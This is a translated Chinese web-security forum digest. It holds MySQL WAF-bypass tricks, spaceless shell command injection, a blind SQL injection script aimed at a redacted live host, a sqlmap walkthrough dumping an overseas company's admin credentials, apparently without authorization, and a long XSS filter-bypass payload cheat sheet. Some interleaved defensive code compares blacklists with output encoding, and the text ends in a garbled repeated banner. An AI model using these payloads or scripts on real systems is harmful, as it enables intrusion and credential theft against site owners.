Today's Tencent interview question: looking for a solution

wukong replied to the question • 8 followers • 5 replies • 578 views • 2016-09-11 16:20 • from related topics

Yesterday's Meituan interview question: given a webshell, how do you penetrate the intranet? Give a detailed approach.

p1rate replied to the question • 9 followers • 4 replies • 1410 views • 2016-09-10 16:00 • from related topics

[Repost] WAF bypass

[Web security / penetration] 糖醋黄瓜 posted an article • 5 comments • 295 views • 2016-09-09 19:33 • from related topics

0x01: The magic ` (that control character used for formatted table output)

Gets past space filters and some regexes.

mysql> select`version`() 
    -> ;  
+----------------------+  
| `version`()          |  
+----------------------+  
| 5.1.50-community-log |  
+----------------------+  
1 row in set (0.00 sec)
A more entertaining trick: this ` character can also serve as a comment character (under certain conditions).

mysql> select id from qs_admins where id=1;`dfff and comment it; 
+----+  
| id |  
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)
usage: where id ='0'`'xxxx   (comment on from the backtick)

0x02: The magic - + .

mysql> select id from qs_admins;  
+----+  
| id | 
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;  
+----------+  
| +id-1+1. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;  
+----------+  
| -id-1+3. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)
(Some people keep asking how to get past keyword filters. If `from` is filtered ... this is how you chain the tokens together.)

0x03: @

mysql> select@^1.from qs_admins;  
+------+  
| @^1. |  
+------+  
| NULL |  
+------+
This bypassed the DedeCMS filter at one time.

Or this way also works.

0x04: MySQL `function() as xxx` also works without `as` and without spaces

mysql> select-count(id)test from qs_admins;  
+------+  
| test |  
+------+  
| -1   |  
+------+  
1 row in set (0.00 sec)

0x05: /*![>5000]*/ with a newly constructed version number (this one may be somewhat dated)

mysql> /*!40000select*/ id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)
 
Try these when you have time; I haven't tested them myself, but they're probably somewhat useful.

What should you do when you run into this while browsing a website?

Kyhvedn posted an article • 5 comments • 290 views • 2016-09-09 15:35 • from related topics

[Image removed by the site: it contained a sensitive corporate link; please redact it and re-upload]
It is clearly a sub-link of a certain website, yet it redirects to a different site...
This is a URL redirect vulnerability.

[Image removed by the site: it contained a sensitive corporate link; please redact it and re-upload]
The directory listing has been exposed, but the site probably hasn't been fully compromised yet.
An exposed directory listing is a small matter, but if confidential files or data sit on the site, others could use it to download and learn about them.

Browsing the paths, you can find the file-upload script.
[screenshot]

The above is an upload point.
I don't need to say what comes next =-=
 
Also, this wasn't done by me....
A roommate posted this URL while we were chatting, I tried looking for directories, and the result....
An accidental find; everyone can take a look, just don't stir up trouble _(:з」∠)_ It will probably be fixed in a day or two.
 
A knight in white, light sword and fast horse
 

Tinkering with running commands without spaces on Linux, environment variables and such

Mosuan posted an article • 3 comments • 404 views • 2016-09-09 15:21 • from related topics

I forget exactly when, but one day I ran into a site where I could execute commands but spaces weren't allowed, so I started messing around...

When I first asked in the group chat, an expert from Ping An mentioned $IFS, so first let's see what $IFS is.

IFS: sets the shell's field separator; by default it is whitespace.

Whitespace by default...

For example, the command ls ../ has a space in the middle; here you can use ls$IFS../ instead.

Linux environment variables can be listed with the set command.

 
In some special environments where certain commands are filtered, built-in environment variables may get around it.
For example, if whoami is filtered but you really want to know who the current user is... the odds of this are 0.000000001, but since I'm fiddling with it anyway, I'll sum it up.

The built-in USER environment variable shows the current user:
echo $USER

 
In Linux, $ fetches a variable; when that variable does not exist, it expands to nothing.

In some cases things are filtered, e.g. $IFS is filtered, or the regex is ls\s../

Then, to run the command anyway, you can use the shell's $ to get around it, e.g. ls$XXOOSSS ../

 
PS: If you have better ideas, feel free to share; I welcome all correct instruction.
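The two filters the post describes, tried against the vulnerable way of running a command (splicing the input into a shell command line) and the hardened way (an argv list, no shell). This is an added example, not the post's own code; it assumes /bin/sh is a POSIX shell such as bash or dash, and the untrusted strings are the post's own payloads, embedded here as constructed input.

```python
"""Why a 'no spaces' filter is not a command-injection control.

Added example, not code from the post above. Assumes /bin/sh is a POSIX
shell; the payloads are the post's own, embedded as constructed input.
"""
import re
import subprocess
from typing import List


def no_space_filter_allows(arg: str) -> bool:
    """The first filter in the post: reject only a literal space character."""
    return " " not in arg


def regex_filter_allows(arg: str) -> bool:
    """The second filter in the post: reject 'ls', whitespace, '../'."""
    return re.search(r"ls\s\.\./", arg) is None


def words_seen_via_shell(arg: str) -> List[str]:
    """Vulnerable pattern: the argument is spliced into a command line that a
    shell parses. printf stands in for the real command so we can observe how
    many words the shell produced after expansion and field splitting."""
    cmd = "printf '%s\\n' " + arg
    out = subprocess.run(cmd, shell=True, capture_output=True,
                         text=True, check=True).stdout
    return out.splitlines()


def words_seen_via_argv(arg: str) -> List[str]:
    """Hardened pattern: an argv list and no shell, so $IFS and $UNSET are
    never expanded and the argument reaches the program byte for byte."""
    out = subprocess.run(["printf", "%s\n", arg], capture_output=True,
                         text=True, check=True).stdout
    return out.splitlines()


if __name__ == "__main__":
    # Constructed inputs: both payloads are taken from the post above.
    for payload in ("ls$IFS../", "ls$XXOOSSS ../"):
        print(repr(payload), "passes filters:",
              no_space_filter_allows(payload), regex_filter_allows(payload))
        print("  shell splits it into:", words_seen_via_shell(payload))
        print("  argv passes it as:   ", words_seen_via_argv(payload))
```

Both payloads pass the filter written for them, and the shell still turns each into the two words `ls` and `../`; only the argv form keeps the input as one literal argument.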
 

Notes on a manual MySQL injection (commas filtered)

[Web security / penetration] Mosuan posted an article • 9 comments • 732 views • 2016-09-09 15:14 • from related topics

# First, thanks to @莲藕炖猪蹄 and @redfree. It isn't about how many tricks you know, as long as yours are correct; feel free to teach me new things. I am genuinely open to being taught.

Also, a bit of clickbait: today I ran into an injection where commas were filtered and sqlmap didn't get it, so out of habit I showed off with a manual injection.

With commas filtered, boolean-based injection can use the substring function. The normal usage is substring(@@version,1,1)=5, guessing that the first character of @@version is 5.

But commas are filtered here. A while ago @莲藕炖猪蹄 taught me that substring can also be used for guessing without commas.

substring(database() from 1) guesses the complete database name.

A quick demonstration on a local database.
 
[screenshot]
First, length(database()) gives 9.

[screenshot]
Next, guess the database name: substring(database() from 9) guesses the last character of the database name.
It didn't find what the last character was... which was awkward. At first I only knew commas were filtered, so I figured some other keyword must be filtered too....

How do you tell what characters are filtered? A simple check: take length() of the current injected statement; if some keyword in the injected statement is filtered, it will definitely return false.
DATA SIZE of 3453 was known to be True.
This showed nothing was being filtered...

At this point @redfree said he had got the injection to work... with the same syntax... damn....
Checking the Python code, redfree said he had added headers, and without the headers it returned False...
Awkward... added the headers and ran it again...

Later redfree said the comment style was the problem... I used to be a developer and had never used -- in an injection; I had needlessly removed the %20 after --, so what followed -- was a single quote... meaning -- was no longer a comment.
Checking the MySQL manual: note that the -- comment style requires at least one space after --! MySQL 3.23.3 and above support the '--' comment style, as long as the comment follows a space.

OK, adding the %20 got it working right away... actually with %23 no space is needed...

The script is as follows:
# -*- coding: utf-8 -*-

import requests

# Characters tried for each position of the database name
payload = list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_')

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate"
}

num = 9        # length(database()) was found to be 9
strings = ''   # the suffix of the name recovered so far
for x in range(1, 10):
    for y in payload:
        y = y + strings   # prepend the candidate character to the known suffix
        # substring(database() from num) returns the name from position num to the end;
        # the host is redacted as in the original post
        url = "http://***.***.**.**/**/user/buyerChannel/indexNew?buyer_id=25966%%27)+AND+substring(database()+from+%d)=%%27%s%%27%%23&_=1466596215826" % (num, y)
        try:
            response = requests.get(url, headers=headers, timeout=5, verify=False)
            if response.text.find('****') != -1:  # change to the keyword you want to look for
                strings = y
                num -= 1
                print(url)
                break
        except Exception as e:
            pass
print('当前数据库名称为: ', end='')
print(strings)
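An added example (not code from either post) that serves this post and the WAF-bypass post above: a small MySQL-style tokenizer used as a detection aid. Matching on tokens instead of on whitespace-separated keywords is what survives the backtick, `1.from`, `/*!40000` and alias-without-AS tricks, and it also recognises the comma-less `substring(... from n)` form and the `--` comment rule discussed here. The sample parameter values are constructed for the demo.

```python
"""Normalise, then inspect: a small MySQL-style tokenizer as a detection aid.

Added example, not code from either post. It covers the lexer quirks in the
WAF-bypass post (backtick identifiers, '1.from', '/*!40000', aliases without
AS) and the comma-less substring(... FROM n) and '--' comment rule from this
post. The sample parameter values below are constructed for the demo.
"""
import re
from urllib.parse import unquote_plus

# Approximation of how the MySQL lexer splits the constructs the posts rely on.
# Alternatives are tried in order at each position, so order matters.
TOKEN_RE = re.compile(r"""
      (?P<vcomment>/\*!\d*)            # version comment opener, e.g. /*!40000
    | (?P<comment_end>\*/)
    | (?P<blockcomment>/\*.*?\*/)      # an ordinary /**/ also separates tokens
    | (?P<backtick>`[^`]*`)            # `version` is an identifier; no space needed
    | (?P<hashcomment>\#.*$)           # '#' comments to end of line, no space needed
    | (?P<dashcomment>--[ \t].*$)      # '-- ' is a comment only with the whitespace
    | (?P<number>\d+\.?\d*)            # '1.' is a complete literal, so '1.from' splits
    | (?P<word>[A-Za-z_][A-Za-z0-9_]*)
    | (?P<var>@@?[A-Za-z_]*)           # '@', '@x', '@@version'
    | (?P<op>[-+*/%^=<>()!,;'".])
    | (?P<ws>\s+)
    | (?P<other>.)
""", re.VERBOSE | re.MULTILINE)


def tokenize(sql):
    """Split sql into (kind, text) pairs without needing whitespace between tokens."""
    return [(m.lastgroup, m.group()) for m in TOKEN_RE.finditer(sql)]


def findings(raw_param):
    """URL-decode one parameter value and report the constructs the posts use."""
    toks = tokenize(unquote_plus(raw_param))
    kinds = [k for k, _ in toks]
    words = [t.lower() for k, t in toks if k == "word"]
    idents = [t.strip("`").lower() for k, t in toks if k == "backtick"]
    ops = [t if k == "op" else None for k, t in toks]
    out = []
    if "select" in words or "union" in words:
        out.append("select/union keyword")
    if "substring" in words and "from" in words:
        out.append("comma-less substring(... from n)")
    if "vcomment" in kinds:
        out.append("version comment /*!NNNNN")
    if "hashcomment" in kinds or "dashcomment" in kinds:
        out.append("trailing comment")
    if any(i in ("version", "database", "user") for i in idents):
        out.append("backtick-quoted function name")
    # Two '-' operators in a row means '--' not followed by whitespace: in MySQL
    # that is not a comment, which is why the post's first run returned False.
    if any(a == "-" and b == "-" for a, b in zip(ops, ops[1:])):
        out.append("'--' without the required space")
    return out


if __name__ == "__main__":
    # Constructed samples; '+' in a query string is a space, so SQL '+' is %2B.
    for sample in ("select%2Bid-1%2B1.from+qs_admins",
                   "/*!40000select*/+id+from+qs_admins",
                   "25966%27)+AND+substring(database()+from+9)=%27a%27%23",
                   "25966"):
        print(sample, "->", findings(sample))
```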

Introduction to the DNS recon tool Altdns [original text from GitHub]

pygain posted an article • 5 comments • 413 views • 2016-09-09 08:55 • from related topics

Altdns - Subdomain discovery through alterations and permutations

Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.

From these two lists that are provided as input to altdns, the tool then generates a massive output of "altered" or "mutated" potential subdomains that could be present. It saves this output so that it can then be used by your favourite DNS bruteforcing tool.

Alternatively, the -r flag can be passed to altdns so that once this output is generated, the tool can then resolve these subdomains (multi-threaded) and save the results to a file.

Altdns works best with large datasets. Having an initial dataset of 200 or more subdomains should churn out some valid subdomains via the alterations generated.
 
 
Download link:

[screenshot]

Install: pip install -r requirements.txt
Usage: ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
 
subdomains.txt: the list of known subdomains
data_output: all the mutated and permuted subdomains
words.txt: the common subdomain words you want to mutate with (dev, qa and the like), one per line
 
                                               Translation: pygain
                                               

A SQL injection penetration-test example, shared

pygain posted an article • 9 comments • 502 views • 2016-09-07 22:16 • from related topics

First, readers are advised not to carry out penetration testing without authorization; and even with authorization, reading the actual data inside the database is not allowed. Because we are the new generation of high-quality, trustworthy security people :)

Below is this website's injection point (it took a long time to find; as for how to find one, Baidu is full of methods, SQL password testing and software testing both work)

[screenshot]

Tool: sqlmap, a powerful database penetration tool based on Python. So before running it, install Python 2.x.x (3.x.x cannot be used).
sqlmap download address:

[screenshot]

Penetration process:
1. At the command line, locate sqlmap.py in the sqlmap folder (cd .. goes up one directory; cd sqlmap enters the folder; dir lists the files). Run "python sqlmap.py -h" in the folder; if the help screen appears, it runs (on some machines you need to type python, on others you don't).
As shown:

[screenshot]

2. Test whether our injection point is usable.
Type:

[screenshot]

The following appears

[screenshot]

* Some prompts appear along the way; if you don't understand them or don't know what to choose, add --batch at the end of the command. From the picture below you can see that the page's id is passed via GET and the type is boolean;

[screenshot]

Right after that, the server's operating system and middleware versions are displayed; the database is MySQL 5.0 or above

[screenshot]


 
3. Let's see which database the current injection involves.
Type:

[screenshot]

Note the fourth line from the bottom

[screenshot]

4. Go into the database and see what's there.
Type:

[screenshot]

The tool's output is actually quite clean

[screenshot]

Since it's an overseas site and it took too long, I stopped it after a while; the tables in the database appeared (not too many)

[screenshot]

5. The CRM_Manager (customer managers) table looked good, so let's go.
Type:

[screenshot]

Some fairly important things came out

[screenshot]

6. Select the five columns Email, Name, Password, qq, skype.
Type:

[screenshot]

Wait patiently......

[screenshot]

Because it's an overseas company it went slowly; unfortunately only the administrator's account and password were dumped (why weren't they encrypted....)
 
That concludes this little penetration test.
 

XSS payload collection (bypasses for multiple scenarios)

[Web security / penetration] Mosuan posted an article • 10 comments • 867 views • 2016-09-05 18:35 • from related topics

Reposted from: d3adend.org/xss/ghettoBypass
Quite comprehensive; I read it through carefully and it's decent.
[ASCII-art banner: Ghetto XSS Cheatsheet]

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = %00).

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>

Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />

Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />

Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />

Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />

Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />

Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />

Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>

Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />

Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>

Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>

Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">

Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>

Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->

No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <

Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>

Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>

JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>

Encoding Galore.

HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>

URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>

JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>

JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>

JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2

<img src="1" onerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

Useless and/or Useful features.

HTML 5 (Not comprehensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

Usage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />

CSS Comments (IE)
<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />

Alternate ways of executing JavaScript functions
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>

Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>

HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>

HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>

XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>

URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)

http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)

Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>

Non-alphanumeric craziness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>

<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
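An added example, not part of the reposted collection: a signature blacklist of the kind the list is written to defeat, checked against four of the payloads above, beside plain output encoding, which needs no signatures at all. The three regexes are an assumed stand-in for a filter, not any real product's rules; the payloads are copied from the list as constructed input.

```python
"""Signature blacklist vs. output encoding, tried on payloads from the list above.

Added example, not from the original page. The three regexes are an assumed
stand-in for a signature-based filter, not any real WAF's rules.
"""
import html
import re

SIGNATURES = [re.compile(p, re.IGNORECASE)
              for p in (r"<script", r"onerror\s*=", r"javascript:")]

# Constructed from the collection above; \x00 is a real null byte here.
PAGE_PAYLOADS = [
    "<sCrIpt>alert(1)</ScRipt>",             # case tricks: caught, the regex is case-insensitive
    "<img src='1' onerror/=alert(0) />",     # slash before '=' evades onerror\s*=
    "<img src='1' onerror\x00=alert(0) />",   # null byte before '=' evades it as well
    '<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(1)"></iframe>',
]


def blacklist_blocks(untrusted: str) -> bool:
    """Signature matching on the raw input, the approach the list is built to defeat."""
    return any(sig.search(untrusted) for sig in SIGNATURES)


def encode_for_html(untrusted: str) -> str:
    """Output encoding for an HTML text node or a quoted attribute value. It does
    not try to recognise attacks; every '<', '>', '&', '"' and "'" is encoded.
    It is NOT enough for an event-handler or URL attribute: the browser
    HTML-decodes those before the JavaScript or URL parser sees them (which is
    exactly why the entity-encoded onerror/src payloads in the list work), so
    untrusted data must not be placed in those sinks at all."""
    return html.escape(untrusted, quote=True)


def can_start_markup(rendered: str) -> bool:
    """Can the rendered string open a tag or close a quoted attribute?"""
    return any(ch in rendered for ch in '<>"\'')


def compare(payloads):
    """Return (payloads the blacklist misses, payloads still dangerous after encoding)."""
    missed = [p for p in payloads if not blacklist_blocks(p)]
    still_dangerous = [p for p in payloads if can_start_markup(encode_for_html(p))]
    return missed, still_dangerous


if __name__ == "__main__":
    missed, dangerous = compare(PAGE_PAYLOADS)
    print("blacklist missed %d of %d payloads" % (len(missed), len(PAGE_PAYLOADS)))
    print("still able to start markup after encoding:", len(dangerous))
```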
 转自:d3adend.org/xss/ghettoBypass
挺全的,我认真了下,还可以。
_____ _          _   _          __   _______ _____   _____ _                _       _               _   
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
